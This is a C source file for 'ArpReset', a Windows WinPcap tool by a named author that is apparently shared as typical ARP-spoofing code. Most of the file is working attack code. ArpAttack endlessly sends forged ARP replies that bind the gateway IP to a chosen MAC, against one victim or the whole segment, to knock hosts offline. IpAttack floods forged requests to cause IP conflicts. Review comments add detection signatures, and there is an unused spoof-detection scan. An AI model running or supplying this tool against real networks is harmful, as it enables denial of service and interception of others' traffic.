
📄 arpreset.cpp

📁 典型的arp欺骗
/****************************************************
                     ArpReset
                  Made By ZwelL
                    2005-9-11
            http://www.donews.net/zwell
                  zwell@sohu.com
****************************************************/
#include <stdio.h>
#include "pcap.h"
#include "Packet32.h"
#include "ntddndis.h"
#include <windows.h>
#include <process.h>
#include <iphlpapi.h>

#pragma comment (lib, "packet.lib")
#pragma comment (lib, "wpcap.lib")
#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "iphlpapi.lib")

#define EPT_IP         0x0800            /* EtherType: IPv4 */
#define EPT_ARP        0x0806            /* EtherType: ARP */
#define EPT_RARP       0x8035            /* EtherType: RARP */
#define ARP_HARDWARE   0x0001            /* ARP hardware type 1 (Ethernet) */
#define ARP_REQUEST    0x0001            /* ARP opcode: request */
#define ARP_REPLY      0x0002            /* ARP opcode: reply */

/* The structs below are handed to pcap_sendpacket() as raw bytes, so padding is disabled. */
#pragma pack(push, 1)

/* Ethernet II frame header. */
typedef struct ehhdr
{
    unsigned char    eh_dst[6];        /* destination ethernet address */
    unsigned char    eh_src[6];        /* source ethernet address */
    unsigned short    eh_type;        /* ethernet packet type (EPT_*), network byte order */
}EHHDR, *PEHHDR;


/* ARP payload for Ethernet/IPv4 (arp_hln = 6, arp_pln = 4 in this file). */
typedef struct arphdr
{
    unsigned short    arp_hrd;            /* format of hardware address */
    unsigned short    arp_pro;            /* format of protocol address */
    unsigned char    arp_hln;            /* length of hardware address */
    unsigned char    arp_pln;            /* length of protocol address */
    unsigned short    arp_op;                /* ARP/RARP operation */

    unsigned char    arp_sha[6];            /* sender hardware address */
    /* NOTE(review): the layout needs unsigned long to be 4 bytes; that holds on
       Windows but not on LP64 platforms - confirm before porting. */
    unsigned long    arp_spa;            /* sender protocol address */
    unsigned char    arp_tha[6];            /* target hardware address */
    unsigned long    arp_tpa;            /* target protocol address */
}ARPHDR, *PARPHDR;

/* Argument block passed to CheckArpSnoofThread. */
typedef struct chkstruct
{
    char gatewaymac[6];        /* binary MAC that the gateway IP resolved to */
    char currentip[30];        /* dotted-quad text of the host being probed */
}CHKSTRUCT, *PCHKSTRUCT;

/* Complete frame as sent on the wire: Ethernet header followed by the ARP payload. */
typedef struct arpPacket
{
    EHHDR    ehhdr;
    ARPHDR    arphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)


BOOL PrintMacAddr(u_char *pMAC);


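/*
 * Convert a MAC address written as 12 hex digits ("001122334455") into
 * its 6-byte binary form.
 *
 * s   - NUL-terminated text; in this program it can come straight from the
 *       command line, so it is treated as untrusted.
 * mac - output buffer of at least 6 bytes.
 *
 * The function never reads past the terminating NUL of s. Digits missing
 * from a short or NULL string are treated as absent, so the corresponding
 * output bytes become 0. The return type is void, so callers that need to
 * reject malformed input must validate the string themselves.
 */
void GetMacAddr(char *s,char *mac)
{
    size_t avail = 0;
    int i;

    if (mac == NULL)
        return;

    /* Measure at most 12 characters so the loop below stays inside the string. */
    if (s != NULL)
    {
        while (avail < 12 && s[avail] != '\0')
            avail++;
    }

    for (i = 0; i < 6; i++)
    {
        char tmp[3] = { 0, 0, 0 };
        size_t off = (size_t)i * 2;

        if (off < avail)
            tmp[0] = s[off];
        if (off + 1 < avail)
            tmp[1] = s[off + 1];

        /* strtol yields 0 for an empty or non-hex pair, as before. */
        mac[i] = (char)(unsigned char)strtol(tmp, NULL, 16);
    }
}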

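/*
 * Look up the MAC address that answers ARP for an IPv4 address.
 *
 * DestIP - dotted-quad text of the address to resolve.
 * pMAC   - output buffer of at least 6 bytes; written only on success.
 *
 * Returns TRUE when SendARP succeeds and reports a 6-byte hardware
 * address, FALSE otherwise (NULL argument, unparsable address, no answer,
 * or an unexpected address length).
 *
 * The answer comes from ARP, which is unauthenticated: on a poisoned
 * segment this returns whatever the spoofing host claims, so treat the
 * result as "who currently answers", not as ground truth.
 */
BOOL GetMacFromIp(char* DestIP, char *pMAC)
{
    ULONG macWords[2] = { 0, 0 };   /* 8 bytes of storage for the 6-byte answer */
    ULONG macLen = 6;
    ULONG addr;

    if (DestIP == NULL || pMAC == NULL)
        return FALSE;

    /* inet_addr signals a parse failure with INADDR_NONE. */
    addr = inet_addr(DestIP);
    if (addr == INADDR_NONE)
        return FALSE;

    if (SendARP(addr, 0, macWords, &macLen) != NO_ERROR)
        return FALSE;

    /* SendARP rewrites macLen with the real length; only Ethernet-sized answers are usable here. */
    if (macLen != 6)
        return FALSE;

    memcpy(pMAC, macWords, 6);
    return TRUE;
}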

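/*
 * Worker thread for the ARP-spoofing check.
 *
 * chk points to a CHKSTRUCT holding the MAC that the gateway IP resolved
 * to (gatewaymac) and the address of one host to probe (currentip). The
 * host is resolved with GetMacFromIp and its MAC is compared with the
 * gateway's. A host that answers with the same MAC as the gateway is
 * reported, since two IPs sharing one MAC is what a poisoned gateway
 * entry looks like from this machine.
 *
 * NOTE(review): the gateway's own address also matches itself; the caller
 * scans the whole /24, so one hit for the gateway IP is expected.
 *
 * Always returns FALSE (0) as the thread exit code, as the original did.
 */
DWORD WINAPI CheckArpSnoofThread(LPVOID chk)
{
    PCHKSTRUCT probe = (PCHKSTRUCT)chk;
    char hostmac[6];

    if (probe == NULL)
        return FALSE;

    memset(hostmac, 0, sizeof(hostmac));

    /* An unresolved host has no MAC to compare; skip it instead of comparing zeros. */
    if (!GetMacFromIp(probe->currentip, hostmac))
        return FALSE;

    printf("%s:", probe->currentip);
    PrintMacAddr((unsigned char *)hostmac);

    /* MACs are binary and may contain zero bytes, so compare with memcmp,
       and report on equality (the original tested strncmp != 0). */
    if (memcmp(hostmac, probe->gatewaymac, sizeof(hostmac)) == 0)
    {
        printf("%s equal the gataway\n", probe->currentip);
    }
    return FALSE;
}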

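/*
 * Scan the /24 around the gateway for hosts that answer ARP with the
 * gateway's MAC address (a sign that the gateway entry is being spoofed).
 *
 * gatewayIP - dotted-quad text of the gateway, e.g. "192.168.1.1".
 *
 * For host numbers 1..254 a CheckArpSnoofThread worker is started, 200 ms
 * apart. Each worker gets its own CHKSTRUCT, and the function waits for
 * every worker before returning. The original shared one stack structure
 * between all threads and returned while they could still be running.
 *
 * Always returns FALSE, as the original did; results are printed by the
 * workers. Malformed input or an unresolvable gateway ends the scan early.
 */
BOOL CheckArpSnoof(char* gatewayIP)
{
    enum { FIRST_HOST = 1, LAST_HOST = 254, HOST_COUNT = 254 };
    CHKSTRUCT probes[HOST_COUNT];
    HANDLE workers[HOST_COUNT];
    char subip[30];
    char gatewaymac[6];
    const char *cursor;
    size_t prefixLen;
    int started = 0;
    int dots;
    int i;

    if (gatewayIP == NULL)
        return FALSE;

    /* Find the character after the third dot; reject text with fewer dots. */
    cursor = gatewayIP;
    for (dots = 0; dots < 3; dots++)
    {
        cursor = strchr(cursor, '.');
        if (cursor == NULL)
            return FALSE;
        cursor++;
    }

    /* Prefix + up to three digits + NUL must fit in currentip. */
    prefixLen = (size_t)(cursor - gatewayIP);
    if (prefixLen + 4 > sizeof(probes[0].currentip) || prefixLen + 1 > sizeof(subip))
        return FALSE;
    memcpy(subip, gatewayIP, prefixLen);
    subip[prefixLen] = '\0';

    /* Without the gateway's MAC there is nothing to compare against. */
    memset(gatewaymac, 0, sizeof(gatewaymac));
    if (!GetMacFromIp(gatewayIP, gatewaymac))
    {
        fprintf(stderr, "Unable to resolve the MAC of %s\n", gatewayIP);
        return FALSE;
    }

    for (i = FIRST_HOST; i <= LAST_HOST; i++)
    {
        CHKSTRUCT *probe = &probes[started];

        memset(probe, 0, sizeof(*probe));
        memcpy(probe->gatewaymac, gatewaymac, sizeof(gatewaymac));
        sprintf(probe->currentip, "%s%d", subip, i);

        workers[started] = CreateThread(NULL, 0, CheckArpSnoofThread, probe, 0, NULL);
        if (workers[started] == NULL)
            continue;   /* slot is reused for the next host */
        started++;
        Sleep(200);
    }

    /* The probes live on this stack frame, so every worker must finish first. */
    for (i = 0; i < started; i++)
    {
        WaitForSingleObject(workers[i], INFINITE);
        CloseHandle(workers[i]);
    }

    return FALSE;
}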

/*
 * Print the six bytes at pMAC to stdout as twelve lowercase hex digits
 * followed by a newline. Always returns TRUE.
 */
BOOL PrintMacAddr(u_char *pMAC)
{
    const u_char *octet = pMAC;
    const u_char *stop = pMAC + 6;

    /* Walk the binary address one byte at a time. */
    while (octet != stop)
    {
        printf("%02x", *octet);
        octet++;
    }
    printf("\n");
    return TRUE;
}

//
// Purpose (author's description): ARP spoofing, used to knock the machine
// with the given IP offline; `all` selects whether the whole segment is
// affected.
//
// tHandle        open pcap handle used for sending
// dstip, dstmac  IP and MAC of the attacked host; dstmac is 6 binary bytes
//                (it is memcpy'd, not parsed)
// srcip          the real IP (the gateway) whose binding is being forged
// srcmac         the forged MAC, as 12 hex digits parsed by GetMacAddr
// all            nonzero: address the frame to FF:FF:FF:FF:FF:FF
//
// What this looks like on the wire, for detection: unsolicited ARP replies
// (opcode 2) repeated about every 200 ms, binding srcip to srcmac. The
// Ethernet source is the fixed value 00:19:DB:26:34:5D while the ARP sender
// hardware address is srcmac, so the two differ unless srcmac happens to
// match. Switch-side Dynamic ARP Inspection, a static ARP entry for the
// gateway, and ARP-change monitoring address this class of traffic.
//
// The function loops forever; it returns only when a send fails.
//
void ArpAttack(pcap_t *tHandle, char *dstip, char *dstmac, char *srcip, char *srcmac, BOOL all)
{
    char MacAddr[6];
    pcap_t *fp=tHandle;
    ARPPACKET ARPPacket;


    // Ethernet destination: the broadcast address when `all` is set,
    // otherwise the victim's MAC.
    if(all)
    {
        GetMacAddr("FFFFFFFFFFFF", MacAddr);
        memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6);
    }
    else
        memcpy(ARPPacket.ehhdr.eh_dst, dstmac, 6);

    // Ethernet source: a hard-coded MAC, independent of srcmac.
    //GetMacAddr("FFFFFFFFFFFF", MacAddr);
	GetMacAddr("0019DB26345D", MacAddr);
    memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6);

    ARPPacket.ehhdr.eh_type = htons(EPT_ARP);

    // ARP header: Ethernet/IPv4, opcode "reply"
    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
    ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op = htons(ARP_REPLY);

    // Sender fields carry the forged binding: srcip is claimed to be at srcmac.
    GetMacAddr(srcmac, MacAddr);
    memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);
    ARPPacket.arphdr.arp_spa = inet_addr(srcip);

    // Target fields: the victim's own MAC and IP.
    //GetMacAddr(dstmac, MacAddr);
    memcpy(ARPPacket.arphdr.arp_tha , dstmac, 6);
    ARPPacket.arphdr.arp_tpa = inet_addr(dstip);

    /* Send down the packet, once per 200 ms, until a send fails */
    while(1)
    {
        // The inner `while` acts as an `if`: its body always returns.
        while (pcap_sendpacket(fp,    // Adapter
            (const unsigned char *)&ARPPacket,                // buffer with the packet
            sizeof(ARPPacket)                    // size
            ) != 0)
        {
            // NOTE(review): pcap_geterr returns a string pointer; %d prints it as a number.
            printf("Error sending the packet: %d\n", pcap_geterr(fp));
            return;
        }
        Sleep(200);
    }

    // Unreachable: the loop above never breaks.
    printf ("Send ok!\n\n");
}


/****************************************************************
Used to cause an IP address conflict (author's note).

tHandle  open pcap handle used for sending
ip       dotted-quad text of the address to conflict with

Builds one ARP request whose sender and target protocol address are
both `ip` and resends it about every 100 ms. main() in this file does
not call it.

For detection: the frames are ARP requests with arp_spa == arp_tpa, a
sender hardware address of 11:11:11:11:11:11, and an Ethernet source
of FF:FF:FF:FF:FF:FE. That source has the group bit set, which a real
station never uses as a source address, so it is a cheap filter.
Duplicate-address warnings on the host that owns `ip` are the visible
symptom.

The function loops forever; it returns only when a send fails.
****************************************************************/
void IpAttack(pcap_t *tHandle, char *ip)
{
    char MacAddr[6];
    pcap_t *fp=tHandle;
    ARPPACKET ARPPacket;


    // Ethernet destination: fixed value FF:FF:FF:FF:FF:FE
    GetMacAddr("FFFFFFFFFFFE", MacAddr);

    memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6);

    // Ethernet source: the same fixed value
    GetMacAddr("FFFFFFFFFFFE", MacAddr);
    memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6);

    ARPPacket.ehhdr.eh_type = htons(EPT_ARP);

    // ARP header: Ethernet/IPv4, opcode "request"
    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
    ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op = htons(ARP_REQUEST);

    // Sender: a made-up MAC claiming to own `ip`
    GetMacAddr("111111111111", MacAddr);
    memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);
    ARPPacket.arphdr.arp_spa = inet_addr(ip);

    // Target: a second made-up MAC and the same `ip`
    GetMacAddr("222222222222", MacAddr);
    memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6);
    ARPPacket.arphdr.arp_tpa = inet_addr(ip);

    /* Send down the packet, once per 100 ms, until a send fails */
    while(1)
    {
        // The inner `while` acts as an `if`: its body always returns.
        while (pcap_sendpacket(fp,    // Adapter
            (const unsigned char *)&ARPPacket,                // buffer with the packet
            sizeof(ARPPacket)                    // size
            ) != 0)
        {
            // NOTE(review): pcap_geterr returns a string pointer; %d prints it as a number.
            printf("Error sending the packet: %d\n", pcap_geterr(fp));
            return;
        }
        Sleep(100);
    }

    // Unreachable: the loop above never breaks.
    printf ("Send ok!\n\n");
}

/* Print the command-line usage text to stdout and terminate with exit status 0. */
void help()
{
    static const char *const usage[] = {
        "arpreset srcip detip destmac [all]\n",
        "example:\n\tarpreset.exe 192.168.1.2 192.168.1.1 000aebcd0138 all\n",
    };
    size_t line;

    /* Neither string contains a conversion, so fputs emits the same bytes as printf did. */
    for (line = 0; line < sizeof(usage) / sizeof(usage[0]); line++)
        fputs(usage[line], stdout);

    exit(0);
}

/*
 * Entry point. Lists the capture adapters, lets the operator pick one,
 * opens it, resolves the MACs of argv[2] and argv[1] with GetMacFromIp,
 * and hands off to ArpAttack.
 *
 * Arguments as used below: argv[1] is passed as dstip, argv[2] as srcip,
 * argv[3] as srcmac; a fifth argument of any value sets `all`.
 *
 * Returns -1 when no adapter is found, the choice is out of range, or
 * the adapter cannot be opened; exits with 1 when the adapter list
 * cannot be read. ArpAttack returns only after a send error, so the
 * cleanup at the end runs only in that case.
 */
int main(int argc, char* argv[])
{
    pcap_if_t *alldevs;
    pcap_if_t *d;
    u_char MacAddr[6], savedMacAddr[6];
    int inum;
    int i=0;
    pcap_t *adhandle;
    char errbuf[PCAP_ERRBUF_SIZE];

    /*CheckArpSnoof("192.168.1.1");*/
    // help() prints the usage text and exits
    if(argc<4)
        help();

    /* Retrieve the device list */
    if(pcap_findalldevs(&alldevs, errbuf) == -1)
    {
        fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }

    /* Print the list */
    printf("============================================\n");
    for(d=alldevs; d; d=d->next)
    {
        printf("%d.", ++i);
        if (d->description)
            printf(" %s\n", d->description);
        else
            printf(" No description available\n");
    }

    if(i==0)
    {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return -1;
    }
    printf("============================================\n");
    printf("Choice the interface number (1-%d):",i);

    // NOTE(review): the scanf result is not checked; on non-numeric input
    // inum is read uninitialized by the range test below.
    scanf("%d", &inum);

    if(inum < 1 || inum > i)
    {
        printf("\nInterface number out of range.\n");
        /* Free the device list */
        pcap_freealldevs(alldevs);
        return -1;
    }

    /* Jump to the selected adapter */
    for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);

    /* Open the adapter */
    if ((adhandle= pcap_open_live(d->name,    // name of the device
        65536,            // portion of the packet to capture. 
        // 65536 grants that the whole packet will be captured on all the MACs.
        1,                // promiscuous mode (nonzero means promiscuous)
        1000,            // read timeout
        errbuf            // error buffer
        )) == NULL)
    {
        fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
        /* Free the device list */
        pcap_freealldevs(alldevs);
        return -1;
    }

    // NOTE(review): d->description may be NULL here (the listing above
    // guards for that), and both GetMacFromIp results are ignored, so a
    // failed lookup leaves the MAC buffers uninitialized.
    printf("\nOperation on %s...\n", d->description);
    GetMacFromIp(argv[2], (char *)savedMacAddr);
    printf("The mac of %s is :", argv[2]); 
    PrintMacAddr(savedMacAddr);
    GetMacFromIp(argv[1], (char *)MacAddr);
	
	// dstip, dstmac: IP and MAC of the attacked host
	// srcip: the real IP (the gateway)
	// srcmac: the forged MAC

    //ArpAttack(adhandle, argv[1], (char *)MacAddr, "192.168.30.115", argv[3], (argc==5));
	ArpAttack(adhandle, argv[1], (char *)MacAddr, argv[2], argv[3], (argc==5));

    printf ("\n\nDetecting end.\n");

    // close the adapter and exit
    pcap_freealldevs(alldevs);
    pcap_close(adhandle);    

    return 0;
}
